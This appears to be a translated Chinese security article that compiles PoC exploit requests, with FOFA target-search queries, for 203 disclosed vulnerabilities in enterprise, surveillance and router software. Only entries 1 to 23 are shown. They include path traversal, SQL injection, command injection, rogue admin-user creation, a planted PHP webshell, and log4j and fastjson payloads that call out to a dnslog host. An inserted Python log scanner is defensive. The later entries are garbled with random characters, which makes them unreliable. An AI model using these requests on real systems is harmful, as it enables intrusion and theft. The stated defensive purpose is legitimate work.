Collection of publicly disclosed Internet vulnerabilities, 2023-09 to 2024-06
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界; author: 网络安全新视界

Purpose: exploitation of N-day vulnerabilities makes up a large share of the attacks seen in offensive/defensive exercises, and we hope this article helps with defence. Defensive teams can use its contents to check their own exposure.

Sources: the article covers 203 PoCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites and were compiled and published by the 网络安全新视界 team.

Patches: all of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Content: because of length limits, a few overly long PoCs are replaced with the word PAYLOAD; search for the full PoC yourself if you need it.

Legal: if any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the account backend to have it removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list". This article is the complete current list; when using it, press F12 and search for keywords.
Bookmark this article if you find it useful, or follow this public account (网络安全新视界).
Table of contents

01

1. StarRocks MPP database unauthenticated access
2. Casdoor static arbitrary file read
3. EasyCVR intelligent edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user creation
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. 鸿运 active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. 红帆 iOffice ioFileDown arbitrary file read
14. 华夏ERP (jshERP) sensitive information disclosure
15. 华夏ERP getAllList information disclosure
16. 红帆 HFOffice 医微云 SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
21. Dahua ICC intelligent IoT integrated management platform random remote code execution
22. Dahua ICC intelligent IoT integrated management platform log4j remote code execution
23. Dahua ICC intelligent IoT integrated management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social business ERP system validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPtech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 authorization bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. Newcapec mobile campus service management platform service.action remote command execution
77. F22 garment management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE bandwidth-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Tosei (Japan) self-service laundry machine RCE
87. DBAppSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. Qi An Xin SecGate 3600 firewall app_av_import_save arbitrary file upload
94. Qi An Xin SecGate 3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast HD intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated admin account creation
111. WordPress plugin HTML5 Video Player SQL injection
112. WordPress plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. 北京百绰智能 S210 management platform uploadfile.php arbitrary file upload
119. 北京百绰智能 S20 backend sysmanageajax.php SQL injection
120. 北京百绰智能 S40 management platform import web.php arbitrary file upload
121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
122. 北京百绰智能 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. 湖南建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer-service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. 网康 NS-ASG application security gateway index.php SQL injection
135. 网康 NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat CORS SSRF
137. 福建科立迅 communications command and dispatch platform down_file.php SQL injection
138. 福建科立讯 communications command and dispatch platform pwd_update.php SQL injection
139. 福建科立讯 communications command and dispatch platform editemedia.php SQL injection
140. 福建科立讯 communications command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communications command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. Gradio arbitrary file read
154. 天维尔 fire-rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 PACS (medical image archiving and communication system) WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning monitoring platform SQL injection
172. DT HD license-plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinhe OA C6 FileDownLoad.aspx arbitrary file read
175. Jinhe OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. 广州图创 library cluster management system updOpuserPw SQL injection
184. 迅饶科技 X2Modbus gateway AddUser arbitrary user creation
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体 佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 Internet behavior management system send_order.cgi command execution
196. 河南省风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. 阿里云盘 (Aliyun Drive) WebDAV command injection
199. Cockpit assetsmanager_upload interface file upload
200. SeaCMS dmku SQL injection
201. Founder omni-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

PoC list

02

1. StarRocks MPP database unauthenticated access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR intelligent edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Replace password with the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. 鸿运 active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
Log in to the admin backend with the default admin account, then perform the operation.
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the login in step one>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. 稻壳CMS (Doccms) keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#


10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"
After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookies.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the following requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request that plants a function which executes a base64-encoded command.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword

Step 3: send the following request to the test target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip


13. 红帆 iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. 华夏ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. 华夏ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. 红帆 HFOffice 医微云 SQL injection
FOFA: title="HFOffice"
The PoC calls a function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
<s11:Body>
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
<netMarkings>
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
</netMarkings>
</ns1:deleteBulletin>
</s11:Body>
</s11:Envelope>


18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


20. Dahua ICC intelligent IoT integrated management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

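For defenders doing the exposure check that the introduction recommends, the following is an added example (written for this edit, not code from the original article or from 网络安全新视界) that matches web access-log lines against a subset of the endpoint paths from entries 1 to 20 above. It normalizes the request path before matching, so that the `;.ico` and `a.ico/../` forms used in entries 14 and 15, percent-encoded or double-encoded input, and long `../` chains as in entry 2 do not slip past a naive string comparison. The log lines, client addresses and label strings are constructed for the example; the endpoint paths come from the entries on this page.

```python
"""Hunt web access logs for the PoC request paths listed in this article.

Each request target is normalized first, because several listed PoCs reach an
endpoint in a form a naive string match misses: percent encoding (sometimes
doubled), ';.ico' suffixes (entry 14), '/a.ico/../' segments (entry 15) and
long '../' chains (entry 2).
"""
import posixpath
import re
from urllib.parse import unquote

# Endpoint paths taken from the PoC entries above (normalized path -> label).
ENDPOINT_SIGNATURES = {
    "/mem_tracker": "entry 1: StarRocks unauthenticated access",
    "/api/v1/userlist": "entry 3: EasyCVR userlist disclosure",
    "/api/v1/adduser": "entry 4: EasyCVR user creation",
    "/__debugging_center_utils___.php": "entry 5: NUUO NVR command execution",
    "/svpn_html/loadfile.php": "entry 6: Sangfor NGAF file read",
    "/808gps/MobileAction_downLoad.action": "entry 7: arbitrary file download",
    "/ioffice/prg/interface/ioFileDown.aspx": "entry 13: iOffice file read",
    "/jshERP-boot/user/getAllList": "entries 14/15: jshERP getAllList disclosure",
    "/evo-apigw/evo-cirs/file/readPic": "entry 20: Dahua ICC file read",
}
TRAVERSAL_LABEL = "path traversal or sensitive file reference"

# Common/combined log format: client ident user [time] "method target proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) (\S+)" (\d{3}) (\S+)')


def fully_decode(text, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded input is compared decoded."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def normalize_path(target):
    """Reduce a request target to the path the application would actually route.

    Drops the query string, percent-decodes, strips ';param' matrix suffixes from
    every segment and collapses '.' and '..' without escaping above '/'.
    """
    path = fully_decode(target.split("?", 1)[0])
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    path = posixpath.normpath(path)
    return path if path.startswith("/") else "/" + path


def classify(target):
    """Return the labels that apply to one request target (empty list = no hit)."""
    labels = []
    decoded = fully_decode(target)
    if "/../" in decoded or decoded.endswith("/..") or "/etc/passwd" in decoded:
        labels.append(TRAVERSAL_LABEL)
    entry = ENDPOINT_SIGNATURES.get(normalize_path(target))
    if entry:
        labels.append(entry)
    return labels


def scan(lines):
    """Parse access-log lines; return (client, status, normalized_path, labels) per hit.

    The status code is kept because a 200 on a listed endpoint needs triage first,
    while a 401/404 is still evidence that the host is being scanned.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, _method, target, _proto, status, _size = m.groups()
        labels = classify(target)
        if labels:
            hits.append((client, int(status), normalize_path(target), labels))
    return hits


# Constructed sample log lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jun/2024:08:01:12 +0800] "GET /mem_tracker HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Jun/2024:08:01:13 +0800] "GET /static/../../../../../../etc/passwd HTTP/1.1" 200 1430',
    '198.51.100.7 - - [10/Jun/2024:08:02:40 +0800] "GET /jshERP-boot/user/getAllList;.ico HTTP/1.1" 200 8812',
    '198.51.100.7 - - [10/Jun/2024:08:02:41 +0800] "GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1" 200 8812',
    '192.0.2.9 - - [10/Jun/2024:08:03:00 +0800] "GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1" 401 87',
    '192.0.2.9 - - [10/Jun/2024:08:03:05 +0800] "GET /index.html HTTP/1.1" 200 2048',
    '192.0.2.9 - - [10/Jun/2024:08:03:06 +0800] "GET /svpn_html/loadfile.php?file=%2Fetc%2F.%2Fpasswd HTTP/1.1" 200 1430',
]

if __name__ == "__main__":
    for client, status, path, labels in scan(SAMPLE_LOG):
        print(f"{client} {status} {path} -> {'; '.join(labels)}")
```

Feed real access logs to scan() line by line and extend ENDPOINT_SIGNATURES with the remaining paths from the list; the signature set is deliberately keyed on the normalized path, not on the raw request line, so the same evasion forms keep matching as new entries are added.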
21. 大华ICC智能物联综合管理平台random远程代码执行5 h3 ]0 @7 h' B, h6 @+ q+ x
FOFA:icon_hash="-1935899595"
+ i, X$ E6 b. M' K: SPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.19 U: L/ m" E1 n) \2 Y% B. ?
Host: x.x.x.x4 O1 }8 i( c ?+ @. |: }& m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
0 S! S" i+ C- kContent-Length: 161% v4 h' ^- C4 {' P* S! u
Accept-Encoding: gzip
& B9 r' }4 P. |2 qConnection: close& Q9 B4 U0 X$ |. x; B2 a
Content-Type: application/json;charset=utf-8# ?2 T: i. K) f1 D
9 w1 l' b5 D' A- L( r% D+ i3 q
{2 y9 ~4 v" O' N- m
"a":{2 h5 V" K# k* N2 n0 N9 G
"@type":"com.alibaba.fastjson.JSONObject",7 E( Q# t+ q* N. E/ v
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}3 x, }: ?& B+ L: W# S2 }
}"", g; r# s/ p$ F
}
$ _' s. s7 O% L6 }( I9 k6 f0 F7 j/ x
; [/ l- v3 p" f' c
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
" p) u' O! i, t. K" WFOFA:icon_hash="-1935899595"3 F- }9 T- q1 J+ u; [: i
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1; U1 S5 l1 g, d, d; @; f
Host: your-ip
# r) X$ Z6 X7 W$ ?4 B1 \# g1 YUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
( m. Y2 q1 u U# y2 _ w! OContent-Type: application/json;charset=utf-8' O' X3 c8 j( R) q$ E: h
' g" | o: k# W d{ P# n! A( e( z3 T1 E; d
"loginName":"${jndi:ldap://dnslog}"
" @1 X' E; m' T' w}
4 S- Z; W5 F3 _0 m: H
. u+ ]8 _) E" r. O; Q2 s
( j7 d j p% v6 D* H
N# U; ~/ |' d" e23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
4 u% E' L( q. R- j) _& _FOFA:icon_hash="-1935899595"1 b7 R1 u' R# a
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
( T0 M: {. x$ `3 wHost: your-ip* C& }0 F8 ]- ?$ W1 z# ^* q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 w4 l/ \$ ?& V- O" @+ A1 mContent-Type: application/json;charset=utf-8. n4 n* Z; W0 T J
Accept-Encoding: gzip( f4 j. R* I- @) U4 H3 x
Connection: close
; P) a% {. n {! a* B, C) ^: T& T6 c" A: x$ m& Z
{
* P; c- X! B4 N6 I1 l$ ` "a":{
